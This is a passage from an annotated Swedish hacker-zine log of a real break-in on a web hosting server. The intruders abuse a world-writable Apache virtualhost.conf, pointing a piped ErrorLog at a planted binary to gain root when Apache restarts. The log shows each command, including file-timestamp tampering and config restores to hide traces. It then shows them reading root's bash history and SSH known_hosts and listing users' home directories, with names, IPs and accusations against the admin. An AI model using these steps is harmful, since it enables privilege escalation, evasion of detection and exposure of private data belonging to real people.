682. spacedmp pts/2 laptop:S.0 Fri 3pm 25:58 50.48s 50.40s epic SpaceDump
683. spacedmp pts/3 laptop:S.1 9:22pm 1:53m 0.06s 0.04s mysql -uroot -p
684. spacedmp pts/4 laptop:S.2 Fri 3pm 2days 0.02s 0.02s /bin/bash
685. spacedmp pts/5 laptop:S.3 8Sep 2 1:36m 7.41s 7.38s ssh -v -l root
686. spacedmp pts/6 laptop:S.4 Fri 3pm 25:31 11.86s 11.85s /usr/apps/pine/
687. spacedmp pts/7 laptop:S.5 8Sep 2 1:23m 0.23s 0.11s telnet -x -l ro
688. spacedmp pts/8 laptop:S.6 8Sep 2 34:26m 2.30s 2.18s ssh -v -l anol
689. spacedmp pts/9 laptop:S.7 8Sep 2 3:49m 50:09 ? -
690. spacedmp pts/10 laptop:S.8 Tue 3pm 22:19m 0.02s 0.02s /bin/bash
691. spacedmp pts/12 laptop:S.9 8Sep 2 1:19m 26.61s 26.60s /usr/apps/opens
692. spacedmp pts/13 laptop:S.15 Thu 6pm 3days 0.12s ? -
693. spacedmp pts/15 laptop:S.11 5:12pm 6:01m 0.01s 0.01s /bin/bash
694. spacedmp pts/16 laptop:S.12 5:46pm 5:28m 0.02s 0.02s /bin/bash
695. spacedmp pts/19 laptop:S.16 Thu 6pm 1:10m 0.39s 0.36s mysql -uroot -p
696. spacedmp pts/20 laptop:S.17 Thu 7pm 47:04m 0.18s ? -
697. coopers pts/14 c-c88970d5.016-3 Wed12am 4days 0.09s 0.09s -bash
698. spacedmp pts/17 laptop:S.13 Thu 2pm 3days 0.04s 0.04s /bin/bash
699. spacedmp pts/21 laptop:S.18 Fri 8pm 37:37m 0.82s 0.80s /usr/apps/opens
700. spacedmp pts/22 laptop:S.19 Sat12am 34:22m 1.41s 1.39s /usr/apps/opens
701. coopers pts/24 c-c88970d5:S.0 10Sep 2 2days 7.97s 7.96s epic CoopSwip -
702. $ cd /usr/web/logs
703. $ ls -l
704. total 1155916
705. -rw-r--r-- 1 root root 19163 Sep 22 23:11 123.shellkonto.nu-combined
706. -rw-r--r-- 1 root root 0 Sep 16 00:00 123.shellkonto.nu-error_log
707. -rw-r--r-- 1 root root 0 Sep 16 00:00 1st.shellkonto.nu-combined
708. -rw-r--r-- 1 root root 0 Sep 16 00:00 1st.shellkonto.nu-error_log
709. -rw-r--r-- 1 root root 961083 Sep 22 23:16 3d.burken.nu-combined
710. -rw-r--r-- 1 root root 7354 Sep 22 22:43 3d.burken.nu-error_log
711. -rw-r--r-- 1 root root 18637378 Sep 22 23:15 access_log
712. -rw-r--r-- 1 root root 11794 Sep 22 11:55 apps.linux.se-combined
713. -rw-r--r-- 1 root root 0 Sep 16 00:00 arkivet.tillberg.net-combined
714. -rw-r--r-- 1 root root 1295 Sep 22 21:07 lindal.bilder.nu-error_log
715. -rw-r--r-- 1 root root 0 Sep 16 00:00 link.tillberg.net-combined
716. -rw-r--r-- 1 root root 4670744 Sep 22 23:03 se2.php.net-error_log
717. -rw-r--r-- 1 root root 41994 Sep 22 17:51 www.h3rbie.com-combined
718. -rw-r--r-- 1 root root 13803 Sep 22 12:43 www.tillberg.net-error_log
719. -rw-r--r-- 1 root root 717 Sep 22 04:10 www.timrahalsostudio.burken.nu-error_log
720. -rw-r--r-- 1 root root 7607 Sep 22 19:53 www.tracit.burken.nu-combined
721. -rwxr-xr-x 1 root root 1090 Mar 29 2001 logcheck.sh
722.  
723. +---------------------------------------------------------------------------+
724. | Ohyggligt l�ng lista p� dom�nnamn d�r. |
725. | Vi kortade ned den ganska graftigt men killen har hand om en j�vla massa. |
726. +---------------------------------------------------------------------------+
727.  
728. $ cat logcheck.sh
729. #!/bin/sh
730.  
731. # Display syntax
732. function dispsyntax {
733. echo Usage: logcheck.sh \<logfile\>
734. }
735.  
736. # Check if we got an argument on the commandline
737. if [ "$1" == "" ];then
738. dispsyntax
739. exit 1
740. fi
741.  
742. # Check if the file exists
743. if [ ! -f $1 ];then
744. echo No such file...
745. exit 1
746. fi
747.  
748. # Get yesterdays date
749. DATE=`date --date '1 day ago' +"%d/%b/%Y"`
750. echo DATE: $DATE
751.  
752. # Fetch the loglines from the file and put it in a temporary file
753. egrep "^[^ ]* [^ ]* [^ ]* \[$DATE.*" $1 > /tmp/www.log
754.  
755. # Get total number of hits from the logfile
756. TOTALHITS=`wc -l /tmp/www.log | awk {'print $1'}`
757. echo TOTALHITS: $TOTALHITS
758.  
759. # Get hourly stats
760. for i in `seq 0 23`;do
761. HOUR=`echo $i | sed -e 's/.*/0&/' | sed -e 's,.*\([0-9][0-9]\)$,\1,'`
762. HOURHITS=`egrep "^[^ ]* [^ ]* [^ ]* \[$DATE:$HOUR.*" /tmp/www.log | wc -l | awk {'print $1'}`
763. echo $i - $HOUR: $HOURHITS
764. done
765.  
766. # Get minute stats
767. for i in `seq 0 59`;do
768. MINUTE=`echo $i | sed -e 's/.*/0&/' | sed -e 's,.*\([0-9][0-9]\)$,\1,'`
769. MINUTEHITS=`egrep "^[^ ]* [^ ]* [^ ]* \[$DATE:12:$MINUTE:.*" /tmp/www.log | wc -l | awk {'print $1'}`
770. echo $i - $MINUTE: $MINUTEHITS
771. done
772. $ pwd
773. /usr/web/logs
774. $ cd ../conf
775. $ ls -alrt
776. total 412
777. drwxrwxrwx 2 httpd httpd 4096 Nov 9 2000 RCS
778. -rwxrwxrwx 1 httpd httpd 357 Feb 10 2001 srm.conf
779. -rwxrwxrwx 1 httpd httpd 9986 Feb 10 2001 mime.types
780. -rwxrwxrwx 1 httpd httpd 12441 Feb 10 2001 magic
781. -rwxrwxrwx 1 httpd httpd 348 Feb 10 2001 access.conf
782. -rw-r--r-- 1 root root 32532 Jun 3 2001 httpd.conf.old
783. -rw-r--r-- 1 root root 23270 Jun 3 2001 virtualhost.conf.old
784. -rwxr-xr-x 1 root root 32673 Apr 30 20:23 httpd.test.conf
785. -rwxr-xr-x 1 root root 41060 May 1 18:35 virtualhost.test.conf
786. drwxr-xr-x 18 root root 4096 Aug 5 15:18 ..
787. -rwxrwxrwx 1 httpd httpd 61 Aug 5 15:24 php.ini
788. -rw-r--r-- 1 root root 357 Aug 25 21:51 srm.conf.default
789. -rw-r--r-- 1 root root 12381 Aug 25 21:51 mime.types.default
790. -rw-r--r-- 1 root root 12965 Aug 25 21:51 magic.default
791. -rw-r--r-- 1 root root 33635 Aug 25 21:51 httpd.conf.default
792. -rw-r--r-- 1 root root 348 Aug 25 21:51 access.conf.default
793. -rwxrwxrwx 1 httpd httpd 32788 Aug 25 21:55 httpd.conf
794. -rwxr-xr-x 1 root root 51224 Aug 25 22:47 virtualhost.conf.20020825
795. drwxrwxrwx 3 httpd httpd 4096 Aug 25 22:47 .
796. -rwxrwxrwx 1 httpd httpd 57271 Sep 13 12:40 virtualhost.conf
797.  
798. #
799. # Julafton - fast det bara �r september
800. # En vanlig finnig n�rd som l�rt sig hacka fr�n happyhacker-texterna
801. # skulle ju s�klart beh�va en suid fil, med ehm.. utnyttjbar kod
802. # - samt en het sploit fr�n bugtraq f�r koka ihop root.
803. #
804. # Vi kan skriva b�de h�r och d�r - det f�rsta som poppar upp
805. # i skallen �r inte "wow, massdeface, alldas, irc, respekt, elajt"
806. #
807. # Apache �r l�tt att f� root via om man kan skriva till httpd.conf.
808. # Det f�rsta man t�nker p� �r kanske att l�ta Apache ladda en modul
809. # (eftersom den i init-rutinen k�rs som root), men httpd -l visar
810. # att mod_so.c inte �r inkompilerad, s� vi f�r k�ra p� med ett annat trick!
811. #
812.  
813.  
814. $ cat virtualhost.conf
815. #ThrottlePolicy none
816.  
817. <Location /throttle-status>
818. SetHandler throttle-status
819. </Location>
820.  
821. <VirtualHost new.burken.nu _default_>
822. #ThrottlePolicy none
823. DocumentRoot /usr/web/htdocs
824. ServerName new.burken.nu
825. </VirtualHost>
826.  
827. <VirtualHost www.djurvall.burken.nu>
828. ThrottlePolicy none
829. DocumentRoot /home/djurvall/public_html
830. ServerAlias djurvall.burken.nu
831. ServerName www.djurvall.burken.nu
832. # TransferLog logs/www.djurvall.burken.nu-access_log
833. CustomLog logs/www.djurvall.burken.nu-combined combined
834. ErrorLog logs/www.djurvall.burken.nu-error_log
835. </VirtualHost>
836.  
837. <VirtualHost www.charliesierra.nu>
838. #ThrottlePolicy none
839. DocumentRoot /home/grkplut/public_html
840. ServerName www.charliesierra.nu
841. ServerAlias charliesierra.nu
842. php_admin_flag safe_mode On
843. php_admin_flag mysql.allow_persistent off
844. CustomLog logs/www.charliesierra.nu-combined combined
845. ErrorLog logs/www.charliesierra.nu-error_log
846. </VirtualHost>
847.  
848. <VirtualHost www.motmakt.nu>
849. #ThrottlePolicy none
850. DocumentRoot /home/loui/public_html
851. ServerName www.motmakt.nu
852. ServerAlias motmakt.nu
853. php_admin_flag safe_mode On
854. php_admin_flag mysql.allow_persistent off
855. CustomLog logs/www.motmakt.nu-combined combined
856. ErrorLog logs/www.motmakt.nu-error_log
857. </VirtualHost>
858.  
859. # ADD HERE
860.  
861. <VirtualHost www3.se.postgresql.org>
862. #ThrottlePolicy none
863. DocumentRoot /export/vol2/webs/www3.se.postgresql.org
864. ServerName www3.se.postgresql.org
865. php_admin_flag safe_mode On
866. CustomLog logs/www3.se.postgresql.org-combined combined
867. ErrorLog logs/www3.se.postgresql.org-error_log
868. </VirtualHost>
869.  
870. #### Dynamiska
871. <VirtualHost 194.236.124.42>
872. #ThrottlePolicy none
873. LogFormat "%V %h %l %u %t \"%r\" %s %b" vcommon
874. UseCanonicalName Off
875. CustomLog logs/virtual-access_log vcommon
876. VirtualDocumentRoot /home/tyko/dynamic/%0
877. </VirtualHost>
878.  
879. <VirtualHost www.burken.nu>
880. #ThrottlePolicy none
881. DocumentRoot /usr/web/webs/www.burken.nu
882. ServerName www.burken.nu
883. # TransferLog logs/www.burken.nu-access_log
884.  
885. # UserDir disabled
886.  
887. UserDir http://www.burken.nu/disabled.php
888.  
889. CustomLog logs/www.burken.nu-combined combined
890. ErrorLog logs/www.burken.nu-error_log
891. </VirtualHost>
892.  
893. <VirtualHost www.xmms.org>
894. ThrottlePolicy none
895. DocumentRoot /home/xmms/web
896. ServerName www.xmms.org
897. ServerAlias sewww.xmms.org
898. ServerAlias xmms.burken.nu
899. <Directory /home/xmms/web>
900. Options Includes ExecCGI Indexes
901. AllowOverride FileInfo AuthConfig Limit
902. <Limit GET POST OPTIONS PROPFIND>
903. Order allow,deny
904. Allow from all
905. </Limit>
906. </Directory>
907. AddHandler server-parsed .html
908. # TransferLog logs/www.xmms.org-access_log
909. # CustomLog logs/www.xmms.org-referer_log referer
910. # CustomLog logs/www.xmms.org-agent_log agent
911. CustomLog logs/www.xmms.org-combined combined
912. ErrorLog logs/www.xmms.org-error_log
913. </VirtualHost>
914.  
915. #
916. # �ven h�r editerade vi kraftigt.
917. # vi vill ju inte tr�ka ut er, eller hur?
918. #
919.  
920.  
921. $ cd ../logs
922. $ find . -name "*error*" -size 0
923. ./stats.burken.nu-error_log
924. ./www.enduro.nu-error_log
925. ./cam.spacedump.pp.se-error_log.swapped
926. ./www.motherjames.com-error_log
927. ./netgoblins.com-error_log.swapped-020915
928. ./www.backman.cc-error_log
929. ./www.musiknoje.nu-error_log
930. ./link.tillberg.net-error_log
931. ./hmpfzie.nu-error_log
932. ./arkivet.tillberg.net-error_log
933. ./www.garnia.nu-error_log
934. ./gettyone.burken.nu-error_log
935. ./photodisc.burken.nu-error_log
936. ./webcam.tracit.burken.nu-error_log
937. $ cd ..
938.  
939. #
940. # Backup �r A och O f�r att lyckas som IT kriminell.
941. #
942.  
943. $ cd conf
944. $ touch -amr virtualhost.conf /var/tmp/.v
945. $ cp virtualhost.conf /var/tmp/.vv
946. $ sed s',logs/www.jowi.nu-error_log,|logs/www.jowi.nu-error-log,' < virtualhost.conf > v
947. $ cat v > virtualhost.conf
948. $ rm v
949. $ grep '|' virtualhost.conf
950. ErrorLog |logs/www.jowi.nu-error-log
951. $ cp /var/tmp/a ../logs/www.jowi.nu-error-log
952. $ chmod 755 ../logs/www.jowi.nu-error-log
953. $ touch -amr /var/tmp/.v virtualhost.conf . ../logs/www.jowi.nu-error-log
954. $ pwd
955. /usr/web/conf
956. $ ls -alrt
957. total 412
958. drwxrwxrwx 2 httpd httpd 4096 Nov 9 2000 RCS
959. -rwxrwxrwx 1 httpd httpd 357 Feb 10 2001 srm.conf
960. -rwxrwxrwx 1 httpd httpd 9986 Feb 10 2001 mime.types
961. -rwxrwxrwx 1 httpd httpd 12441 Feb 10 2001 magic
962. -rwxrwxrwx 1 httpd httpd 348 Feb 10 2001 access.conf
963. -rw-r--r-- 1 root root 32532 Jun 3 2001 httpd.conf.old
964. -rw-r--r-- 1 root root 23270 Jun 3 2001 virtualhost.conf.old
965. -rwxr-xr-x 1 root root 32673 Apr 30 20:23 httpd.test.conf
966. -rwxr-xr-x 1 root root 41060 May 1 18:35 virtualhost.test.conf
967. drwxr-xr-x 18 root root 4096 Aug 5 15:18 ..
968. -rwxrwxrwx 1 httpd httpd 61 Aug 5 15:24 php.ini
969. -rw-r--r-- 1 root root 357 Aug 25 21:51 srm.conf.default
970. -rw-r--r-- 1 root root 12381 Aug 25 21:51 mime.types.default
971. -rw-r--r-- 1 root root 12965 Aug 25 21:51 magic.default
972. -rw-r--r-- 1 root root 33635 Aug 25 21:51 httpd.conf.default
973. -rw-r--r-- 1 root root 348 Aug 25 21:51 access.conf.default
974. -rwxrwxrwx 1 httpd httpd 32788 Aug 25 21:55 httpd.conf
975. -rwxr-xr-x 1 root root 51224 Aug 25 22:47 virtualhost.conf.20020825
976. -rwxrwxrwx 1 httpd httpd 57272 Sep 13 12:40 virtualhost.conf
977. drwxrwxrwx 3 httpd httpd 4096 Sep 13 12:40 .
978. $ cd RCS
979. $ ls
980. virtualhost.conf,v
981. $ ls -alrt
982. total 20
983. -rwxrwxrwx 1 httpd httpd 8852 Nov 9 2000 virtualhost.conf,v
984. drwxrwxrwx 2 httpd httpd 4096 Nov 9 2000 .
985. drwxrwxrwx 3 httpd httpd 4096 Sep 13 12:40 ..
986. $ cd ../../logs
987. $ ls -l www.jowi.nu-error-log
988. -rwxr-xr-x 1 httpd httpd 15848 Sep 13 12:40 www.jowi.nu-error-log
989.  
990.  
991. # Detta �r v�r nya v�n - programmet som ska ge oss root on demand n�sta g�ng
992. # Apache startas om..
993. # Eftersom t�lmodighet �r det enda vettiga s� struntar vi i att kill -STOP
994. # alla Apacheprocesser och sen gn�lla hos Spacedump s� han startar om Apache :P
995. # Chansen att han uppt�cker n�t �r mindre d�.. f�r vem skulle inte bli
996. # f�rvirrad om Apache slutade g�ra sitt jobb bara s�d�r? ;>
997.  
998.  
999. $ strip www.jowi.nu-error-log
1000.  
1001. $ ls -l www.jowi.nu-error-log
1002. -rwxr-xr-x 1 httpd httpd 6260 Sep 22 23:27 www.jowi.nu-error-log
1003. $ touch -amr /var/tmp/.v . www.jowi.nu-error-log
1004. $ cd ../conf
1005. $ grep '|' virtualhost.conf
1006. ErrorLog |logs/www.jowi.nu-error-log
1007. $ ls -l /usr/web/logs/www.jowi.nu-error-log
1008. -rwxr-xr-x 1 httpd httpd 6260 Sep 13 12:40 /usr/web/logs/www.jowi.nu-error-log
1009.  
1010.  
1011. #
1012. # N�gra tester som gjordes p� en annan j00n1xdata visade att
1013. # |logs/www.jowi.nu-error-log inte fungerade.. Vi m�ste anv�nda oss av
1014. # full path - inte lika sneaky, men hindrar oss knappast fr�n att koka roota ;)
1015.  
1016.  
1017. $ pwd
1018. /usr/web/conf
1019. $ sed s',|logs/www.jowi.nu-error-log,|/usr/web/logs/www.jowi.nu-error-log,' < virtualhost.conf > v
1020. $ cat v > virtualhost.conf
1021. $ rm v
1022. $ touch -amr /var/tmp/.v . virtualhost.conf
1023. $ cp virtualhost.conf /var/tmp/.vx
1024. $ cat /var/tmp/.vv > virtualhost.conf
1025. $ touch -amr /var/tmp/.v . virtualhost.conf
1026. $ uname -a
1027. Linux fs02 2.4.9 #1 SMP Thu Aug 23 18:44:06 CEST 2001 i686 unknown
1028. $ date
1029. Sun Sep 22 23:51:01 CEST 2002
1030. $ cat /var/tmp/.vx > virtualhost.conf
1031. $ ls -l /usr/web/logs/www.jowi.nu-error-log
1032. -rwxr-xr-x 1 httpd httpd 6260 Sep 13 12:40 /usr/web/logs/www.jowi.nu-error-log
1033. $ touch -amr /var/tmp/.v virtualhost.conf .
1034. $ cd /var/tmp
1035. $ strip .a
1036. $ touch -amr .v .a .vx .vv
1037. $ date
1038. Sun Sep 22 23:57:30 CEST 2002
1039. $ date
1040. Mon Sep 23 00:01:05 CEST 2002
1041. $ df -k
1042. Filesystem 1k-blocks Used Available Use% Mounted on
1043. /dev/hda2 4065500 3508100 347352 91% /
1044. /dev/hda1 22580 1917 19459 9% /boot
1045. /dev/hda4 34321796 32115832 2205964 94% /export/vol1
1046. /dev/hdb1 39076880 37517344 1559536 96% /export/vol2
1047. fs01:/export/vol2/unix/s/spacedmp
1048. 30443079 28618001 173699 99% /home/spacedmp
1049. bettan:/usr/home/bbs/web
1050. 36294258 1037918 32352800 3% /export/vol2/webs/bbs.linux.se
1051. bettan:/usr/home/linuxse/web
1052. 36294258 1037918 32352800 3% /export/vol2/webs/www.linux.se
1053. bettan:/usr/home/lstore
1054. 36294258 1037918 32352800 3% /export/vol2/webs/www.linuxstore.se
1055. bettan:/usr/home/shellkonto/web
1056. 36294258 1037918 32352800 3% /export/vol2/webs/www.shellkonto.nu
1057. fs01:/export/vol2/unix/s/spacedmp
1058. 30443079 28618001 173699 99% /home/spacedmp
1059. fs01:/export/vol3/ftp
1060. 15920515 4564114 11185042 29% /home/ftp
1061. fs01:/export/vol2/unix/b/budis
1062. 30443079 28618001 173699 99% /home/budis
1063. fs01:/export/vol2/unix/t/tillberg
1064. 30443079 28618001 173699 99% /home/tillberg
1065. fs01:/export/vol2/unix/b/byggsus
1066. 30443079 28618001 173699 99% /home/byggsus
1067. fs01:/export/vol2/unix/a/angel
1068. 30443079 28618001 173699 99% /home/angel
1069. fs01:/export/vol2/unix/m/movitz
1070. 30443079 28618001 173699 99% /home/movitz
1071. fs01:/export/vol2/unix/k/krokros
1072. 30443079 28618001 173699 99% /home/krokros
1073. fs01:/export/vol2/unix/b/bihrner
1074. 30443079 28618001 173699 99% /home/bihrner
1075. fs01:/export/vol2/unix/s/stx
1076. 30443079 28618001 173699 99% /home/stx
1077. fs01:/export/vol2/unix/t/tripodz
1078. 30443079 28618001 173699 99% /home/tripodz
1079. fs01:/export/vol2/unix/p/psycho
1080. 30443079 28618001 173699 99% /home/psycho
1081. fs01:/export/vol2/unix/f/forze
1082. 30443079 28618001 173699 99% /home/forze
1083. fs01:/export/vol2/unix/s/sidewalk
1084. 30443079 28618001 173699 99% /home/sidewalk
1085. fs01:/export/vol2/unix/t/tilion
1086. 30443079 28618001 173699 99% /home/tilion
1087. fs01:/export/vol2/unix/s/sebbz
1088. 30443079 28618001 173699 99% /home/sebbz
1089. fs01:/export/vol2/unix/m/meat
1090. 30443079 28618001 173699 99% /home/meat
1091. fs01:/export/vol2/unix/s/smallone
1092. 30443079 28618001 173699 99% /home/smallone
1093. fs01:/export/vol2/unix/e/emess
1094. 30443079 28618001 173699 99% /home/emess
1095. $ id
1096. uid=501(httpd) gid=501(httpd) groups=501(httpd)
1097. $ cd /var/tmp
1098. $ ed
1099. a
1100.  
1101. [* kod till errorlogprogram bortklipp *]
1102. .
1103. w a.c
1104. q
1105. 4297
1106. $ make a
1107. $ gcc -o a a.c -O2 -Wall
1108. $ strip a
1109. $ rm a.c
1110. $ cd /usr/web/logs
1111. $ cat /var/tmp/a > www.jowi.nu-error-log
1112. sh: www.jowi.nu-error-log: Text file busy
1113.  
1114.  
1115. # haha - surprise!
1116. # n�gon / n�got har precis startat om apache s� den har startat www.jowi.nu-error-log
1117. # I feel lucky! Nu �re nog dags att dra ner p� statoil och handla lite lotter
1118.  
1119. $ cd /var/tmp
1120. $ ed
1121. a
1122.  
1123. [* Koden som utnyttjar errorlogprogrammet (www.jowi.nu-error-log) saxad..
1124. Det �r Flashback som varit framme och SAXAT fr�n oss, haha!
1125. Yo yo, det �r vi som �r LoLing Stoned's - shara knarket broder! *]
1126. .
1127. w r.c
1128. 1757
1129. q
1130. $ make r
1131. cc r.c -o r
1132. $ cd /usr/web/conf
1133. $ cat /var/tmp/.vv > virtualhost.conf
1134. $ touch -amr /var/tmp/.v virtualhost.conf .
1135.  
1136.  
1137. # Eftersom vi inte vill bli uppt�ckta �terst�llde vi konfigfilen.
1138. # Inte s� stor risk att Spacedump lyckas snubbla �ver det, men
1139. # man vet aldrig ;>
1140.  
1141. $ /var/tmp/r &
1142. $ rm -f /var/tmp/r*
1143. $ kill -9 $$
1144.  
1145.  
1146.  
1147. +-------------------------------------------------------------------------+
1148. | EDITOR note: |
1149. | F�r er som inte riktigt h�ngde med d�r skall |
1150. | jag f�rklara vad det var som h�nde. |
1151. | I och med att b�de virtualhost.conf och logfilerna var |
1152. | skrivbara av alla s� skrev dom �ver en logfil med ett program, |
1153. | och bad apache att �ppna den som |/usr/web/logs/www.jowi.nu-error-log |
1154. | dvs. Att programmet skulle exekveras. Som root! |
1155. | |
1156. | Detta �r ett utm�rkt exempel att p� att hacka en dator |
1157. | utan att anv�nda exploits, inga patchar skyddar mot en dum admin! |
1158. | |
1159. +-------------------------------------------------------------------------+
1160.  
1161.  
1162.  
1163. # I v�r nya r00t-en4bl4d3!! termimnal h�nde f�ljande
1164. $ cd /root
1165. $ ls -alrt
1166. total 29348
1167. -rw-r--r-- 1 root root 114 May 8 1993 .lesskey
1168. -rw-r--r-- 1 root root 48 Sep 11 1996 .less
1169. -rw-r--r-- 1 root root 75277 Dec 23 1997 nc110.tar.gz
1170. -rw-r--r-- 1 root root 159028 Jun 17 1999 mpg123-0.59r.tar.gz
1171. -rw-r--r-- 1 root root 332253 Sep 6 2000 rsync-2.4.6.tar.gz
1172. -rw-r--r-- 1 root root 82161 Oct 22 2000 oidentd-1.7.1.tar.gz
1173. -rw-r--r-- 1 root root 872451 Feb 21 2001 mrtg-2.9.10.tar.gz
1174. -rw-r--r-- 1 root root 257631 Feb 22 2001 gd-1.8.4.tar.gz
1175. -rw-r--r-- 1 root root 320 Feb 26 2001 index.html
1176. -rw-r--r-- 1 root root 274318 Mar 1 2001 gd-1.8.3.tar.gz
1177. -rw-r--r-- 1 root root 12076 Mar 1 2001 mysql.db
1178. -rw-r--r-- 1 root root 297467 Mar 1 2001 reiserfs-utils-3.6.25.tar.gz
1179. -rw-r--r-- 1 root root 31 Mar 5 2001 .klogin
1180. -rw-r--r-- 1 root root 772176 Mar 11 2001 mkisofs-1.13.tar.gz
1181. drwxr-xr-x 5 root root 4096 Mar 24 2001 mirror
1182. -rwxr-xr-x 1 root root 58 Apr 12 2001 perl-test.pl
1183. drwxr-xr-x 2 root root 4096 Dec 15 2001 .ssh
1184. -rw-r--r-- 1 root root 8642 Feb 4 2002 linux-se.bash_history
1185. -rw-r--r-- 1 root root 30 Mar 16 2002 .amandahosts
1186. drwxr-xr-x 2 root root 4096 Mar 31 11:09 TAKEN
1187. -rw-r--r-- 1 root root 2695311 Apr 18 21:43 cvs-1.11.2.tar.gz?JServSessionIdservlets=fi1q876xk1
1188. drwxr-xr-x 2 root root 4096 May 1 09:32 .mc
1189. drwxr-xr-x 2 root root 4096 Jun 26 19:54 backup
1190. drwxr-xr-x 3 root root 4096 Jun 29 18:03 cvstest
1191. drwxr-xr-x 24 root root 4096 Jun 30 10:39 ..
1192. -rw------- 1 root root 164 Jun 30 12:00 .cvspass
1193. -rw-r--r-- 1 root root 265729 Sep 4 02:44 prcinfo
1194. drwxr-xr-x 11 root root 4096 Sep 8 13:21 src
1195. -rw------- 1 root root 13256 Sep 22 17:27 .bash_history
1196. $ cd TAKEN
1197. $ ls -l
1198. total 0
1199. drwxr-xr-x 4 root root 96 Mar 22 08:27 home/
1200. $ cd home
1201. $ ls
1202. covers/
1203. zao/
1204. $ ypcat passwd|egrep zao\|covers
1205. zao:*:1346:1346:Lars Viklund [Linux.SE]:/home/zao:/bin/bash
1206. covers:*:1372:1372:Magnus Bondesson [Linux.SE]:/home/covers:/bin/bash
1207.  
1208.  
1209. # Enormt oetiskt.. Han har stulit folks homedirs :(
1210. # Fy fan f�r dig, Spacedump!
1211.  
1212.  
1213. $ cd ../../dl
1214. $ ls
1215. AUTODESK.BUILDING.ELECTRICAL.V1.0.ISO-RiSE/
1216. $ warez
1217. bash: warez: command not found
1218.  
1219. #
1220. #
1221. # [ http://www.antipiratbyran.com/tips.asp ]
1222. # -------> SE HIT <-------------------------
1223. # OLAGLIGA KOPIOR P� SKYDDAT MATERIAL !!!
1224. # Spacedump distribuerar olagliga kopior p� dyra program!
1225. # OLAGLIGA KOPIOR P� SKYDDAT MATERIAL !!!
1226. # -------------------> SE HIT <-------------
1227. # [ http://www.antipiratbyran.com/tips.asp ]
1228. #
1229. #
1230.  
1231.  
1232. $ cd ..
1233. $ cat .bash_history
1234. ls
1235. du
1236. vi dagbok.php
1237. cat connect.php
1238. vi connect.php
1239. exit
1240. pwd
1241. ls
1242. w
1243. uptime
1244. w
1245. who
1246. w
1247. exit
1248. ls
1249. ls
1250. du
1251. ls
1252. du
1253. ls -l
1254. cd /root/src/
1255. ls
1256. cd ..
1257. vi /etc/passwd
1258. pwd
1259. id
1260. w
1261. w
1262. w
1263. w
1264. w
1265. w
1266. w
1267. ps auxw
1268. ps auxw
1269. ftp 0
1270. df
1271. pwd
1272. ls
1273. cd /home/noaksson
1274. cd public_html/
1275. l
1276. ls
1277. mysql -uroot -p _system
1278. mysql -uroot -p _system
1279. cat /etc/passwd
1280. pwd
1281. ls
1282. exit
1283. vi /etc/passwd
1284. TERM=xterm
1285.  
1286. #
1287. # heh, grabben har skillz
1288. #
1289.  
1290. $ id
1291. uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(operator)
1292. $ arp -na &
1293. ? (194.236.124.59) at 00:60:1D:F1:76:AB [ether] on eth0
1294. ? (194.236.124.52) at 00:D0:B7:3B:2C:89 [ether] on eth0
1295. ? (194.236.124.49) at 00:60:1D:F1:5E:9F [ether] on eth0
1296. ? (194.236.124.43) at 00:D0:B7:49:96:04 [ether] on eth0
1297. ? (194.236.124.41) at 00:0A:41:FD:0E:C0 [ether] on eth0
1298. ? (194.236.124.40) at 00:0A:41:FD:16:C0 [ether] on eth0
1299. ? (194.236.124.36) at 00:03:47:A4:76:01 [ether] on eth0
1300. ? (194.236.124.34) at 00:D0:B7:83:72:31 [ether] on eth0
1301. ? (194.236.124.33) at 00:80:C8:B9:B8:B5 [ether] on eth0
1302. $ cd .ssh
1303. $ ls -alrt
1304. total 24
1305. -rw------- 1 root root 512 Sep 25 2001 random_seed
1306. -rw-r--r-- 1 root root 342 Dec 15 2001 authorized_keys
1307. drwxr-xr-x 2 root root 4096 Dec 15 2001 .
1308. drwx--x--- 17 root root 4096 Sep 20 15:37 ..
1309. -rw------- 1 root root 4903 Sep 22 16:13 known_hosts
1310. $ cat kn*
1311. warez,194.236.124.48 1024 33 168151578264579140639696453178019738841809063112571996663912298218985713296408221853335115268160062262281374797843836493948217369130749728533115721721903399806241604580469229335000742846562828265405453401230514916705128731325658466058370410655791677481994254580601189829821100386246370876194934518807339978597
1312. warez,194.236.124.48 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEA0Oj0s6bGL/uXuSaUb9QGG1z3klcdivozVCBvMwe6wmGBTSuttwU7mMOhVEubqHiEVO0DsPzFXr8Sgjn94GmP5L8nQyRgkSkAxsvhM2r7RHCrP3uSZ82gB3zO8/AfzE0aQA1MokH5mA1GVJtlQ/+1la909aGfeSKXlLAHiZ8xzWE=
1313. 172.17.196.45 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEAwKdpuGfC3M4JOlAAUslkf3rd1QhRqv548wq2J0iDPyVLXf31QjIiCoIpDJ3y8Qtjfz621DH+0+4h8J/bflsM5296CUffNv35xQNUfV1FCB45ucQmtYsJtTjjQ2+uIjpCOSn4TKkGQc5E/NqGRnzuzLceSbNv/S4AYIH52daOOBc=
1314. 0,0.0.0.0 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEAyuoNtWHm6vqkmnRpdvT+HyLIwkFFRxEO9oG7i41uxXN/KBAw6uUbEVaTOAUMeD00vV9z0FJfCa3MqO3+ZuAFE+sIM/z3iReWHV5iBZnyg207drh41+kTUtDlUD3NrY9cqaVgisCIbGBKB83ReYaBNbqvnHXjlPUPefsK9jVUmGM=
1315.  
1316.  
1317. #
1318. # G�r v�rlden en tj�nst - tipsa Antipiratbyr�n ASAP!
1319. # WAREZ @ warez.spacedump.pp.se
1320. # ---> warez,194.236.124.48 <---
1321. # ---> warez,194.236.124.48 <---
1322. # ---> warez,194.236.124.48 <---
1323. # ---> warez,194.236.124.48 <---
1324. # ---> warez,194.236.124.48 <---
1325. # ---> warez,194.236.124.48 <---
1326. # ---> warez,194.236.124.48 <---
1327. # ---> warez,194.236.124.48 <---
1328. # ---> warez,194.236.124.48 <---
1329. # WAREZ @ warez.spacedump.pp.se
1330. #
1331. #
1332.  
1333. $ cd /home
1334. $ ls
1335. alhakim
1336. bilder
1337. bobis
1338. covers
1339. djurvall
1340. engman
1341. esnweb
1342. evonite
1343. ftp
1344. hulteniu
1345. ia
1346. icom2002
1347. kattmat
1348. liket
1349. matty
1350. perrra
1351. revo9
1352. rickard
1353. spacedmp
1354. tilion
1355. tod
1356. treggy88
1357. xmms
1358. zmanga
1359. zrkaska
1360. zybernic
1361. $ cd spa*
1362. $ cd .ssh
1363. $ ls -alrt
